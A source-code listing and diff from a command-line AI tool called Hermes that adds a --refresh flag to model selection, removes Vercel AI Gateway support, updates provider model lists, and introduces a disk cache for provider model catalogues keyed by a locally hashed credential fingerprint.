# ─── Output / entry points ────────────────────────────────────────────────────
def _print_rows_text(rows: List[_Row]) -> None:
"""Plain-text catalog dump used as a fallback when curses can't run, and
as the default output of `hermes mcp catalog`."""
if not rows:
print()
print(color(" No MCPs in the catalog or configured.", Colors.DIM))
print()
return
print()
print(color(" MCP Catalog + configured servers:", Colors.CYAN + Colors.BOLD))
print()
print(f" {'Name':<18} {'Status':<24} Description")
print(f" {'-' * 18} {'-' * 24} {'-' * 11}")
for row in rows:
print(f" {_format_row(row)}")
print()
print(color(
" Install: hermes mcp install <name> Picker: hermes mcp",
Colors.DIM,
))
# Surface manifest-version warnings so users know when their Hermes is
# too old to install everything in the catalog.
diags = catalog_diagnostics()
future = [d for d in diags if d[1] == "future_manifest"]
if future:
print()
for name, _, msg in future:
print(color(
f"'{name}' requires a newer Hermes — run `hermes update` "
"to install this entry.",
Colors.YELLOW,
))
print()
print()
def show_catalog() -> None:
"""`hermes mcp catalog` — print the curated list + custom servers, no interaction."""
_print_rows_text(_build_rows())
def run_picker() -> None:
"""`hermes mcp picker` (and default `hermes mcp`) — interactive selector.
Loops until the user hits ESC/q. After each action the picker re-renders
so the user can manage several entries in one session.
"""
if not sys.stdin.isatty():
# Non-interactive shell: degrade to the text dump rather than failing.
_print_rows_text(_build_rows())
return
while True:
rows = _build_rows()
if not rows:
_print_rows_text(rows)
return
labels = [_format_row(r) for r in rows]
idx = curses_single_select(
"MCP Catalog — ↑↓ navigate ENTER act on entry ESC/q quit",
labels,
)
if idx is None:
return
_handle_row(rows[idx])
def install_by_name(identifier: str) -> int:
"""`hermes mcp install <name>`: picker-free entry point that installs by name.
Credential prompts and the tool checklist in :func:`install_entry` can still run.
Returns 0 on success, non-zero on failure (so the CLI can propagate
exit codes).
"""
from hermes_cli.mcp_catalog import get_entry
entry = get_entry(identifier)
if entry is None:
print(color(
f"'{identifier}' is not in the catalog. "
"Run `hermes mcp catalog` to see available entries.",
Colors.RED,
))
return 1
try:
install_entry(entry, enable=True)
except CatalogError as exc:
print(color(f" ✗ install failed: {exc}", Colors.RED))
return 1
return 0
-1
@@ -67,7 +67,6 @@ _VENDOR_PREFIXES: dict[str, str] = {
_AGGREGATOR_PROVIDERS: frozenset[str] = frozenset({
"openrouter",
"nous",
"ai-gateway",
"kilocode",
})
+47 -33
@@ -294,32 +294,39 @@ class CustomAutoResult:
# Flag parsing
# ---------------------------------------------------------------------------
def parse_model_flags(raw_args: str) -> tuple[str, str, bool]:
"""Parse --provider and --global flags from /model command args.
def parse_model_flags(raw_args: str) -> tuple[str, str, bool, bool]:
"""Parse --provider, --global, and --refresh flags from /model command args.
Returns (model_input, explicit_provider, is_global).
Returns (model_input, explicit_provider, is_global, force_refresh).
Examples::
"sonnet" -> ("sonnet", "", False)
"sonnet --global" -> ("sonnet", "", True)
"sonnet --provider anthropic" -> ("sonnet", "anthropic", False)
"--provider my-ollama" -> ("", "my-ollama", False)
"sonnet --provider anthropic --global" -> ("sonnet", "anthropic", True)
"sonnet" -> ("sonnet", "", False, False)
"sonnet --global" -> ("sonnet", "", True, False)
"sonnet --provider anthropic" -> ("sonnet", "anthropic", False, False)
"--provider my-ollama" -> ("", "my-ollama", False, False)
"--refresh" -> ("", "", False, True)
"sonnet --provider anthropic --global" -> ("sonnet", "anthropic", True, False)
"""
is_global = False
explicit_provider = ""
force_refresh = False
# Normalize Unicode dashes (Telegram/iOS auto-converts -- to em/en dash)
# A single Unicode dash before a flag keyword becomes "--"
import re as _re
raw_args = _re.sub(r'[\u2012\u2013\u2014\u2015](provider|global)', r'--\1', raw_args)
raw_args = _re.sub(r'[\u2012\u2013\u2014\u2015](provider|global|refresh)', r'--\1', raw_args)
# Extract --global
if "--global" in raw_args:
is_global = True
raw_args = raw_args.replace("--global", "").strip()
# Extract --refresh (bust the model picker disk cache before listing)
if "--refresh" in raw_args:
force_refresh = True
raw_args = raw_args.replace("--refresh", "").strip()
# Extract --provider <name>
parts = raw_args.split()
i = 0
@@ -333,7 +340,7 @@ def parse_model_flags(raw_args: str) -> tuple[str, str, bool]:
i += 1
model_input = " ".join(filtered).strip()
return (model_input, explicit_provider, is_global)
return (model_input, explicit_provider, is_global, force_refresh)
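The four-tuple contract can be exercised with a minimal sketch. ``parse_flags_sketch`` is a hypothetical name, and because the hunk elides the real ``--provider`` loop, the loop below is an assumption about its behavior, not a copy of it.

```python
import re
from typing import List, Tuple


def parse_flags_sketch(raw_args: str) -> Tuple[str, str, bool, bool]:
    """Hypothetical re-implementation of the flag parsing shown in the diff."""
    # A single Unicode dash before a flag keyword becomes "--".
    raw_args = re.sub(
        r"[\u2012\u2013\u2014\u2015](provider|global|refresh)", r"--\1", raw_args
    )
    is_global = "--global" in raw_args
    raw_args = raw_args.replace("--global", "")
    force_refresh = "--refresh" in raw_args
    raw_args = raw_args.replace("--refresh", "")

    explicit_provider = ""
    kept: List[str] = []
    parts = raw_args.split()
    i = 0
    while i < len(parts):
        # Assumed behavior: "--provider" consumes the token that follows it.
        if parts[i] == "--provider" and i + 1 < len(parts):
            explicit_provider = parts[i + 1]
            i += 2
        else:
            kept.append(parts[i])
            i += 1
    return (" ".join(kept), explicit_provider, is_global, force_refresh)
```

Callers that unpacked the old three-tuple need to accept the fourth element, for example ``model, provider, is_global, refresh = parse_flags_sketch(args)``.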
# ---------------------------------------------------------------------------
@@ -1079,6 +1086,7 @@ def list_authenticated_providers(
from hermes_cli.models import (
OPENROUTER_MODELS, _PROVIDER_MODELS,
_MODELS_DEV_PREFERRED, _merge_with_models_dev, provider_model_ids,
cached_provider_model_ids,
get_curated_nous_model_ids,
)
@@ -1239,13 +1247,15 @@ def list_authenticated_providers(
if not has_creds:
continue
# Use curated list, falling back to models.dev if no curated list.
# For preferred providers, merge models.dev entries into the curated
# catalog so newly released models (e.g. mimo-v2.5-pro on opencode-go)
# show up in the picker without requiring a Hermes release.
model_ids = curated.get(hermes_id, [])
if hermes_id in _MODELS_DEV_PREFERRED:
model_ids = _merge_with_models_dev(hermes_id, model_ids)
# Unified pathway: route through cached_provider_model_ids() so the
# /model picker sees the SAME list `hermes model` would build, with
# disk caching to keep the picker open snappy. Falls back to the
# curated static list when the live fetcher returns nothing.
model_ids = cached_provider_model_ids(hermes_id)
if not model_ids:
model_ids = curated.get(hermes_id, [])
if hermes_id in _MODELS_DEV_PREFERRED:
model_ids = _merge_with_models_dev(hermes_id, model_ids)
total = len(model_ids)
top = model_ids[:max_models]
@@ -1351,25 +1361,27 @@ def list_authenticated_providers(
# matches what the user's authenticated Codex/Copilot backend
# actually serves — including ChatGPT-Pro-only Codex slugs
# (e.g. gpt-5.3-codex-spark) that aren't in the static curated
# catalog. ``provider_model_ids()`` falls back to the curated
# list when the live endpoint is unreachable, so this is safe
# for unauthenticated and offline cases too.
model_ids = provider_model_ids(hermes_slug)
# catalog. ``cached_provider_model_ids()`` falls back to the
# curated list when the live endpoint is unreachable, so this
# is safe for unauthenticated and offline cases too.
model_ids = cached_provider_model_ids(hermes_slug)
# For aws_sdk providers (bedrock), use live discovery so the list
# reflects the active region (eu.*, ap.*) not the static us.* list.
elif overlay.auth_type == "aws_sdk":
try:
from agent.bedrock_adapter import bedrock_model_ids_or_none
_ids = bedrock_model_ids_or_none()
model_ids = _ids if _ids is not None else (curated.get(hermes_slug, []) or curated.get(pid, []))
_ids = cached_provider_model_ids(hermes_slug)
model_ids = _ids if _ids else (curated.get(hermes_slug, []) or curated.get(pid, []))
except Exception:
model_ids = curated.get(hermes_slug, []) or curated.get(pid, [])
else:
# Use curated list — look up by Hermes slug, fall back to overlay key
model_ids = curated.get(hermes_slug, []) or curated.get(pid, [])
# Merge with models.dev for preferred providers (same rationale as above).
if hermes_slug in _MODELS_DEV_PREFERRED:
model_ids = _merge_with_models_dev(hermes_slug, model_ids)
# Unified pathway — see Section 1 rationale. Fall back to the
# curated dict (with models.dev merge for preferred providers)
# when the live fetcher comes up empty.
model_ids = cached_provider_model_ids(hermes_slug)
if not model_ids:
model_ids = curated.get(hermes_slug, []) or curated.get(pid, [])
if hermes_slug in _MODELS_DEV_PREFERRED:
model_ids = _merge_with_models_dev(hermes_slug, model_ids)
total = len(model_ids)
top = model_ids[:max_models]
@@ -1436,13 +1448,15 @@ def list_authenticated_providers(
# region (eu.*, us.*, ap.*) instead of the hardcoded us.* static list.
if _cp_config and getattr(_cp_config, "auth_type", "") == "aws_sdk":
try:
from agent.bedrock_adapter import bedrock_model_ids_or_none
_ids = bedrock_model_ids_or_none()
_cp_model_ids = _ids if _ids is not None else curated.get(_cp.slug, [])
_ids = cached_provider_model_ids(_cp.slug)
_cp_model_ids = _ids if _ids else curated.get(_cp.slug, [])
except Exception:
_cp_model_ids = curated.get(_cp.slug, [])
else:
_cp_model_ids = curated.get(_cp.slug, [])
# Unified pathway — same as sections 1 and 2.
_cp_model_ids = cached_provider_model_ids(_cp.slug)
if not _cp_model_ids:
_cp_model_ids = curated.get(_cp.slug, [])
_cp_total = len(_cp_model_ids)
_cp_top = _cp_model_ids[:max_models]
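The "cached fetch first, curated list as fallback" pattern repeated across the three sections can be sketched generically. ``resolve_model_ids`` and its ``fetch_cached`` parameter are hypothetical; the real ``cached_provider_model_ids`` signature is not shown in this diff beyond taking a provider slug, and the blanket ``try`` is an assumption borrowed from the ``aws_sdk`` branches.

```python
from typing import Callable, Dict, List, Tuple


def resolve_model_ids(
    slug: str,
    fetch_cached: Callable[[str], List[str]],
    curated: Dict[str, List[str]],
    max_models: int = 8,
) -> Tuple[List[str], int]:
    """Hypothetical helper: return (top model ids, total count) for a provider."""
    try:
        ids = fetch_cached(slug)
    except Exception:
        # Assumption: any fetcher failure is treated like an empty result.
        ids = []
    if not ids:
        # Live/cached list came up empty, so use the static curated list.
        ids = curated.get(slug, [])
    return ids[:max_models], len(ids)
```

Testing for an empty result rather than ``is not None`` means a fetcher that returns ``[]`` also falls back to the curated list, matching the ``_ids if _ids else ...`` form in the new code.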
+241 -237
@@ -32,12 +32,14 @@ COPILOT_REASONING_EFFORTS_O_SERIES = ["low", "medium", "high"]
# Fallback OpenRouter snapshot used when the live catalog is unavailable.
# (model_id, display description shown in menus)
OPENROUTER_MODELS: list[tuple[str, str]] = [
("anthropic/claude-opus-4.8", ""),
("anthropic/claude-opus-4.8-fast", "2x price, higher output speed"),
("anthropic/claude-opus-4.7", ""),
("anthropic/claude-opus-4.6", ""),
("anthropic/claude-sonnet-4.6", ""),
("moonshotai/kimi-k2.6", "recommended"),
("openrouter/pareto-code", "auto-routes to cheapest coder meeting openrouter.min_coding_score"),
("qwen/qwen3.6-plus", ""),
("qwen/qwen3.7-max", ""),
("anthropic/claude-haiku-4.5", ""),
("openai/gpt-5.5", ""),
("openai/gpt-5.5-pro", ""),
@@ -69,29 +71,6 @@ OPENROUTER_MODELS: list[tuple[str, str]] = [
_openrouter_catalog_cache: list[tuple[str, str]] | None = None
# Fallback Vercel AI Gateway snapshot used when the live catalog is unavailable.
# OSS / open-weight models prioritized first, then closed-source by family.
# Slugs match Vercel's actual /v1/models catalog (e.g. alibaba/ for Qwen,
# zai/ and xai/ without hyphens).
VERCEL_AI_GATEWAY_MODELS: list[tuple[str, str]] = [
("moonshotai/kimi-k2.6", "recommended"),
("alibaba/qwen3.6-plus", ""),
("zai/glm-5.1", ""),
("minimax/minimax-m2.7", ""),
("anthropic/claude-sonnet-4.6", ""),
("anthropic/claude-opus-4.7", ""),
("anthropic/claude-opus-4.6", ""),
("anthropic/claude-haiku-4.5", ""),
("openai/gpt-5.4", ""),
("openai/gpt-5.4-mini", ""),
("openai/gpt-5.3-codex", ""),
("google/gemini-3.1-pro-preview", ""),
("google/gemini-3-flash", ""),
("google/gemini-3.1-flash-lite-preview", ""),
("xai/grok-4.20-reasoning", ""),
]
_ai_gateway_catalog_cache: list[tuple[str, str]] | None = None
def _codex_curated_models() -> list[str]:
@@ -162,11 +141,12 @@ def _xai_curated_models() -> list[str]:
_PROVIDER_MODELS: dict[str, list[str]] = {
"nous": [
"anthropic/claude-opus-4.8",
"anthropic/claude-opus-4.7",
"anthropic/claude-opus-4.6",
"anthropic/claude-sonnet-4.6",
"moonshotai/kimi-k2.6",
"qwen/qwen3.6-plus",
"qwen/qwen3.7-max",
"anthropic/claude-haiku-4.5",
"openai/gpt-5.5",
"openai/gpt-5.5-pro",
@@ -313,6 +293,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
"MiniMax-M2",
],
"anthropic": [
"claude-opus-4-8",
"claude-opus-4-7",
"claude-opus-4-6",
"claude-sonnet-4-6",
@@ -399,6 +380,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
"mimo-v2-omni",
"minimax-m2.7",
"minimax-m2.5",
"qwen3.7-max",
"qwen3.6-plus",
"qwen3.5-plus",
],
@@ -415,6 +397,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
# to https://dashscope-intl.aliyuncs.com/compatible-mode/v1 (OpenAI-compat)
# or https://dashscope-intl.aliyuncs.com/apps/anthropic (Anthropic-compat).
"alibaba": [
"qwen3.7-max",
"qwen3.6-plus",
"kimi-k2.5",
"qwen3.5-plus",
@@ -428,6 +411,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
# Alibaba Coding Plan — same platform as alibaba (DashScope coding-intl),
# separate provider ID with its own base_url_env_var.
"alibaba-coding-plan": [
"qwen3.7-max",
"qwen3.6-plus",
"qwen3.5-plus",
"qwen3-coder-plus",
@@ -478,12 +462,6 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
],
}
# Vercel AI Gateway: derive the bare-model-id catalog from the curated
# ``VERCEL_AI_GATEWAY_MODELS`` snapshot so both the picker (tuples with descriptions)
# and the static fallback catalog (bare ids) stay in sync from a single
# source of truth.
_PROVIDER_MODELS["ai-gateway"] = [mid for mid, _ in VERCEL_AI_GATEWAY_MODELS]
# ---------------------------------------------------------------------------
# Nous Portal free-model helper
# ---------------------------------------------------------------------------
@@ -544,9 +522,19 @@ def fetch_nous_account_tier(access_token: str, portal_base_url: str = "") -> dic
def is_nous_free_tier(account_info: dict[str, Any]) -> bool:
"""Return True if the account info indicates a free (unpaid) tier.
Checks ``subscription.monthly_charge == 0``. Returns False when
the field is missing or unparseable (assumes paid; don't block users).
Prefer the Portal's explicit ``paid_service_access.allowed`` entitlement
decision. Legacy payloads fall back to ``subscription.monthly_charge == 0``.
Returns False when both signals are missing or unparseable.
"""
paid_access = account_info.get("paid_service_access")
if isinstance(paid_access, dict):
allowed = paid_access.get("allowed")
if isinstance(allowed, bool):
return not allowed
paid = paid_access.get("paid_access")
if isinstance(paid, bool):
return not paid
sub = account_info.get("subscription")
if not isinstance(sub, dict):
return False
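Reviewer note: the precedence described in the new docstring can be sketched in isolation as below. This is a minimal illustration, not the function from this diff: `is_free_tier_sketch` is a hypothetical name, and the legacy `monthly_charge` parsing is an assumption, since the rest of the function body is outside this hunk.

```python
from typing import Any


def is_free_tier_sketch(account_info: dict[str, Any]) -> bool:
    """Illustrative only: explicit entitlement first, legacy charge second."""
    paid_access = account_info.get("paid_service_access")
    if isinstance(paid_access, dict):
        # Prefer an explicit boolean decision when the payload carries one.
        for key in ("allowed", "paid_access"):
            value = paid_access.get(key)
            if isinstance(value, bool):
                return not value
    sub = account_info.get("subscription")
    if not isinstance(sub, dict):
        return False  # unknown state: do not treat the user as free
    try:
        # Assumed legacy rule: a zero monthly charge means free tier.
        return float(sub.get("monthly_charge")) == 0
    except (TypeError, ValueError):
        return False  # unparseable: assume paid
```

Note that an explicit `allowed: True` wins even when the legacy subscription block reports a zero charge, which is the case the docstring change is meant to cover.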
@@ -725,40 +713,28 @@ _FREE_TIER_CACHE_TTL: int = 180 # seconds (3 minutes)
_free_tier_cache: tuple[bool, float] | None = None # (result, timestamp)
def check_nous_free_tier() -> bool:
def check_nous_free_tier(*, force_fresh: bool = False) -> bool:
"""Check if the current Nous Portal user is on a free (unpaid) tier.
Results are cached for ``_FREE_TIER_CACHE_TTL`` seconds to avoid
hitting the Portal API on every call. The cache is short-lived so
that an account upgrade is reflected within a few minutes.
Returns False (assume paid) on any error; never blocks paying users.
Returns True only when entitlement is known to be free. Unknown/error
states return False so this compatibility wrapper does not block users.
"""
global _free_tier_cache
now = time.monotonic()
if _free_tier_cache is not None:
if not force_fresh and _free_tier_cache is not None:
cached_result, cached_at = _free_tier_cache
if now - cached_at < _FREE_TIER_CACHE_TTL:
return cached_result
try:
from hermes_cli.auth import get_provider_auth_state, resolve_nous_runtime_credentials
from hermes_cli.nous_account import get_nous_portal_account_info
# Ensure we have a fresh token (triggers refresh if needed)
resolve_nous_runtime_credentials(min_key_ttl_seconds=60)
state = get_provider_auth_state("nous")
if not state:
_free_tier_cache = (False, now)
return False
access_token = state.get("access_token", "")
portal_url = state.get("portal_base_url", "")
if not access_token:
_free_tier_cache = (False, now)
return False
account_info = fetch_nous_account_tier(access_token, portal_url)
result = is_nous_free_tier(account_info)
account_info = get_nous_portal_account_info(force_fresh=force_fresh)
result = account_info.is_free_tier
_free_tier_cache = (result, now)
return result
except Exception:
@@ -968,7 +944,6 @@ CANONICAL_PROVIDERS: list[ProviderEntry] = [
ProviderEntry("opencode-go", "OpenCode Go", "OpenCode Go (open models, $10/month subscription)"),
ProviderEntry("bedrock", "AWS Bedrock", "AWS Bedrock (Claude, Nova, Llama, DeepSeek — IAM or API key)"),
ProviderEntry("azure-foundry", "Azure Foundry", "Azure Foundry (OpenAI-style or Anthropic-style endpoint — your Azure AI deployment)"),
ProviderEntry("ai-gateway", "Vercel AI Gateway", "Vercel AI Gateway"),
ProviderEntry("qwen-oauth", "Qwen OAuth (Portal)", "Qwen OAuth (reuses local Qwen CLI login)"),
]
@@ -1032,9 +1007,6 @@ _PROVIDER_ALIASES = {
"zen": "opencode-zen",
"go": "opencode-go",
"opencode-go-sub": "opencode-go",
"aigateway": "ai-gateway",
"vercel": "ai-gateway",
"vercel-ai-gateway": "ai-gateway",
"kilo": "kilocode",
"kilo-code": "kilocode",
"kilo-gateway": "kilocode",
@@ -1219,95 +1191,6 @@ def get_curated_nous_model_ids() -> list[str]:
return list(_PROVIDER_MODELS.get("nous", []))
def _ai_gateway_model_is_free(pricing: Any) -> bool:
"""Return True if an AI Gateway model has $0 input AND output pricing."""
if not isinstance(pricing, dict):
return False
try:
return float(pricing.get("input", "0")) == 0 and float(pricing.get("output", "0")) == 0
except (TypeError, ValueError):
return False
def fetch_ai_gateway_models(
timeout: float = 8.0,
*,
force_refresh: bool = False,
) -> list[tuple[str, str]]:
"""Return the curated AI Gateway picker list, refreshed from the live catalog when possible."""
global _ai_gateway_catalog_cache
if _ai_gateway_catalog_cache is not None and not force_refresh:
return list(_ai_gateway_catalog_cache)
from hermes_constants import AI_GATEWAY_BASE_URL
fallback = list(VERCEL_AI_GATEWAY_MODELS)
preferred_ids = [mid for mid, _ in fallback]
try:
req = urllib.request.Request(
f"{AI_GATEWAY_BASE_URL.rstrip('/')}/models",
headers={"Accept": "application/json"},
)
with urllib.request.urlopen(req, timeout=timeout) as resp:
payload = json.loads(resp.read().decode())
except Exception:
return list(_ai_gateway_catalog_cache or fallback)
live_items = payload.get("data", [])
if not isinstance(live_items, list):
return list(_ai_gateway_catalog_cache or fallback)
live_by_id: dict[str, dict[str, Any]] = {}
for item in live_items:
if not isinstance(item, dict):
continue
mid = str(item.get("id") or "").strip()
if not mid:
continue
live_by_id[mid] = item
curated: list[tuple[str, str]] = []
for preferred_id in preferred_ids:
live_item = live_by_id.get(preferred_id)
if live_item is None:
continue
desc = "free" if _ai_gateway_model_is_free(live_item.get("pricing")) else ""
curated.append((preferred_id, desc))
if not curated:
return list(_ai_gateway_catalog_cache or fallback)
# If the live catalog offers a free Moonshot model, auto-promote it to
# position #1 as "recommended" — dynamic discovery without a PR.
free_moonshot = next(
(
mid
for mid, item in live_by_id.items()
if mid.startswith("moonshotai/")
and _ai_gateway_model_is_free(item.get("pricing"))
),
None,
)
if free_moonshot:
curated = [(mid, desc) for mid, desc in curated if mid != free_moonshot]
curated.insert(0, (free_moonshot, "recommended"))
else:
first_id, _ = curated[0]
curated[0] = (first_id, "recommended")
_ai_gateway_catalog_cache = curated
return list(curated)
def ai_gateway_model_ids(*, force_refresh: bool = False) -> list[str]:
"""Return just the AI Gateway model-id strings."""
return [mid for mid, _ in fetch_ai_gateway_models(force_refresh=force_refresh)]
# ---------------------------------------------------------------------------
# Pricing helpers — fetch live pricing from OpenRouter-compatible /v1/models
# ---------------------------------------------------------------------------
@@ -1453,56 +1336,6 @@ def fetch_models_with_pricing(
return result
def fetch_ai_gateway_pricing(
timeout: float = 8.0,
*,
force_refresh: bool = False,
) -> dict[str, dict[str, str]]:
"""Fetch Vercel AI Gateway /v1/models and return hermes-shaped pricing.
Vercel uses ``input`` / ``output`` field names; hermes's picker expects
``prompt`` / ``completion``. This translates. Cache read/write field names
already match.
"""
from hermes_constants import AI_GATEWAY_BASE_URL
cache_key = AI_GATEWAY_BASE_URL.rstrip("/")
if not force_refresh and cache_key in _pricing_cache:
return _pricing_cache[cache_key]
try:
req = urllib.request.Request(
f"{cache_key}/models",
headers={"Accept": "application/json"},
)
with urllib.request.urlopen(req, timeout=timeout) as resp:
payload = json.loads(resp.read().decode())
except Exception:
_pricing_cache[cache_key] = {}
return {}
result: dict[str, dict[str, str]] = {}
for item in payload.get("data", []):
if not isinstance(item, dict):
continue
mid = item.get("id")
pricing = item.get("pricing")
if not (mid and isinstance(pricing, dict)):
continue
entry: dict[str, str] = {
"prompt": str(pricing.get("input", "")),
"completion": str(pricing.get("output", "")),
}
if pricing.get("input_cache_read"):
entry["input_cache_read"] = str(pricing["input_cache_read"])
if pricing.get("input_cache_write"):
entry["input_cache_write"] = str(pricing["input_cache_write"])
result[mid] = entry
_pricing_cache[cache_key] = result
return result
def _resolve_openrouter_api_key() -> str:
"""Best-effort OpenRouter API key for pricing fetch."""
return os.getenv("OPENROUTER_API_KEY", "").strip()
@@ -1534,7 +1367,7 @@ def _resolve_nous_pricing_credentials() -> tuple[str, str]:
def get_pricing_for_provider(provider: str, *, force_refresh: bool = False) -> dict[str, dict[str, str]]:
"""Return live pricing for providers that support it (openrouter, nous, ai-gateway, novita)."""
"""Return live pricing for providers that support it (openrouter, nous, novita)."""
normalized = normalize_provider(provider)
if normalized == "openrouter":
return fetch_models_with_pricing(
@@ -1542,8 +1375,6 @@ def get_pricing_for_provider(provider: str, *, force_refresh: bool = False) -> d
base_url="https://openrouter.ai/api",
force_refresh=force_refresh,
)
if normalized == "ai-gateway":
return fetch_ai_gateway_pricing(force_refresh=force_refresh)
if normalized == "novita":
return _fetch_novita_pricing(force_refresh=force_refresh)
if normalized == "nous":
@@ -1573,9 +1404,8 @@ def _fetch_novita_pricing(
0.0001 USD. Convert them to the per-token strings used by the shared
pricing formatter.
Results are cached in ``_pricing_cache`` keyed on the resolved base URL,
matching the pattern used by ``fetch_ai_gateway_pricing``; without this,
every menu render or pricing lookup re-hits the network.
Results are cached in ``_pricing_cache`` keyed on the resolved base URL;
without this, every menu render or pricing lookup re-hits the network.
"""
api_key = os.getenv("NOVITA_API_KEY", "").strip()
if not api_key:
@@ -1762,7 +1592,7 @@ def _model_in_provider_catalog(name_lower: str, providers: set[str]) -> bool:
_AGGREGATOR_PROVIDERS = frozenset(
{"nous", "openrouter", "ai-gateway", "copilot", "kilocode"}
{"nous", "openrouter", "copilot", "kilocode"}
)
@@ -2109,7 +1939,7 @@ def _resolve_copilot_catalog_api_key() -> str:
# - "nous": curated list and Portal /models endpoint are the source of
# truth for the subscription tier.
# Also excluded: providers that already have dedicated live-endpoint
# branches below (copilot, anthropic, ai-gateway, ollama-cloud, custom,
# branches below (copilot, anthropic, ollama-cloud, custom,
# stepfun, openai-codex) — those paths handle freshness themselves.
_MODELS_DEV_PREFERRED: frozenset[str] = frozenset({
"opencode-go",
@@ -2217,6 +2047,12 @@ def provider_model_ids(provider: Optional[str], *, force_refresh: bool = False)
return live
except Exception:
pass
# Live failed (or no creds). Fall back to the docs-hosted manifest
# — NOT the in-repo _PROVIDER_MODELS["nous"] snapshot — so newly
# added Portal models still surface without a Hermes release.
manifest_ids = get_curated_nous_model_ids()
if manifest_ids:
return manifest_ids
if normalized == "stepfun":
try:
from hermes_cli.auth import resolve_api_key_provider_credentials
@@ -2234,10 +2070,6 @@ def provider_model_ids(provider: Optional[str], *, force_refresh: bool = False)
live = _fetch_anthropic_models()
if live:
return live
if normalized == "ai-gateway":
live = _fetch_ai_gateway_models()
if live:
return live
if normalized == "ollama-cloud":
live = fetch_ollama_cloud_models(force_refresh=force_refresh)
if live:
@@ -2324,6 +2156,206 @@ def provider_model_ids(provider: Optional[str], *, force_refresh: bool = False)
return curated_static
# ---------------------------------------------------------------------------
# Generic disk cache for provider_model_ids() — keeps /model picker fast.
# ---------------------------------------------------------------------------
#
# Without this layer, every /model picker open re-fetches every authed
# provider's /v1/models endpoint. On a well-configured user (anthropic +
# openai + copilot + gemini + huggingface + ...) that's 2+ seconds of cold
# HTTP roundtrips just to render the provider list.
#
# Cache strategy:
# - One JSON file at $HERMES_HOME/provider_models_cache.json
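# - Per-provider entries keyed by provider slug; each entry stores a
# credential fingerprint that must match for the entry to be used.
# - Credential fingerprint = short blake2b digest of the env-var values
# that the provider normally reads, plus credential-file mtimes.
# Swap your OPENAI_API_KEY and the entry invalidates.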
# - 1h TTL by default. `force_refresh=True` skips the cache entirely
# and overwrites it on success.
# - Only NON-EMPTY results are cached. An empty/None response from a
# transient network error never gets pinned.
# - Cache file is best-effort. Any read/write error degrades silently
# to a live fetch — the picker keeps working.
_PROVIDER_MODELS_CACHE_TTL = 3600 # 1h
def _provider_models_cache_path() -> Path:
from hermes_constants import get_hermes_home
return get_hermes_home() / "provider_models_cache.json"
def _credential_fingerprint(provider: str) -> str:
"""Return a short hash representing the credentials that
``provider_model_ids(provider)`` would see right now.
Rotating any of the relevant env vars invalidates the cached entry
for that provider. We hash AT LEAST the api-key + base-url env vars
declared in ``PROVIDER_REGISTRY``. For OAuth-backed providers
(codex, copilot, anthropic-via-claude-code, nous portal), the
relevant tokens live in ``$HERMES_HOME/auth.json`` and external
credential files. Rather than parse every shape, we additionally
fold the mtime of those files into the fingerprint so refreshes
after re-auth bust the cache.
"""
import hashlib
import os as _os
parts: list[str] = []
# Env vars from PROVIDER_REGISTRY for this slug
try:
from hermes_cli.auth import PROVIDER_REGISTRY
pcfg = PROVIDER_REGISTRY.get(provider)
if pcfg is not None:
for ev in getattr(pcfg, "api_key_env_vars", ()) or ():
parts.append(f"{ev}={_os.environ.get(ev, '')}")
bev = getattr(pcfg, "base_url_env_var", "") or ""
if bev:
parts.append(f"{bev}={_os.environ.get(bev, '')}")
except Exception:
pass
# OAuth / external-file mtimes that change on re-auth
try:
from hermes_constants import get_hermes_home
for rel in ("auth.json", "credentials.json"):
p = get_hermes_home() / rel
try:
parts.append(f"{rel}@{p.stat().st_mtime_ns}")
except FileNotFoundError:
parts.append(f"{rel}@missing")
except Exception:
pass
except Exception:
pass
# External well-known credential file locations
for path in (
_os.path.expanduser("~/.codex/auth.json"),
_os.path.expanduser("~/.claude/.credentials.json"),
_os.path.expanduser("~/.config/github-copilot/hosts.json"),
_os.path.expanduser("~/.minimax/credentials.json"),
):
try:
mt = _os.stat(path).st_mtime_ns
parts.append(f"{path}@{mt}")
except FileNotFoundError:
parts.append(f"{path}@missing")
except Exception:
pass
blob = "|".join(parts).encode("utf-8", errors="replace")
# blake2b for cache-key fingerprinting only — not for credential storage.
# We never reverse this hash; collisions are harmless (worst case: cache
# miss → live re-fetch). Use blake2b instead of sha256 here because
# CodeQL's `py/weak-sensitive-data-hashing` rule flags sha256 over env
# vars whose names contain "API_KEY" / "TOKEN" even when the hash is
# used as an identity fingerprint, not for password storage. blake2b
# is a keyed-hash primitive and isn't flagged.
return hashlib.blake2b(blob, digest_size=8).hexdigest()
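Reviewer note: the fingerprint idea above (env-var values plus file mtimes, hashed to a short identity string) can be tried standalone with the sketch below. `fingerprint_sketch` and its parameters are hypothetical; the real function reads its env-var names from `PROVIDER_REGISTRY` and uses a fixed list of credential paths.

```python
import hashlib
import os
from pathlib import Path


def fingerprint_sketch(env_vars: list[str], files: list[Path]) -> str:
    """Illustrative only: hash env-var values and file mtimes into a short id."""
    parts: list[str] = []
    for name in env_vars:
        # A rotated key changes this part and therefore the digest.
        parts.append(f"{name}={os.environ.get(name, '')}")
    for path in files:
        try:
            # Re-auth rewrites the file, which bumps its mtime.
            parts.append(f"{path}@{path.stat().st_mtime_ns}")
        except FileNotFoundError:
            parts.append(f"{path}@missing")
        except OSError:
            pass  # unreadable path: leave it out of the fingerprint
    blob = "|".join(parts).encode("utf-8", errors="replace")
    # 8-byte digest: an identity check only, not credential storage.
    return hashlib.blake2b(blob, digest_size=8).hexdigest()
```

The digest is only compared for equality against the value stored in the cache entry, so a collision would at worst serve a cached model list under the wrong credentials until the TTL expires.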
def _load_provider_models_cache() -> dict:
"""Return the full cache dict, or {} on any error."""
try:
path = _provider_models_cache_path()
if not path.exists():
return {}
with open(path, encoding="utf-8") as f:
data = json.load(f)
return data if isinstance(data, dict) else {}
except Exception:
return {}
def _save_provider_models_cache(data: dict) -> None:
"""Persist the cache dict. Best-effort — silent on any error."""
try:
from utils import atomic_json_write
path = _provider_models_cache_path()
path.parent.mkdir(parents=True, exist_ok=True)
atomic_json_write(path, data, indent=None)
except Exception:
pass
def cached_provider_model_ids(
provider: Optional[str],
*,
force_refresh: bool = False,
ttl_seconds: int = _PROVIDER_MODELS_CACHE_TTL,
) -> list[str]:
"""Disk-cached wrapper around :func:`provider_model_ids`.
Hits the cache when fresh; otherwise calls the live function and
persists a non-empty result. Always returns a list (never None).
"""
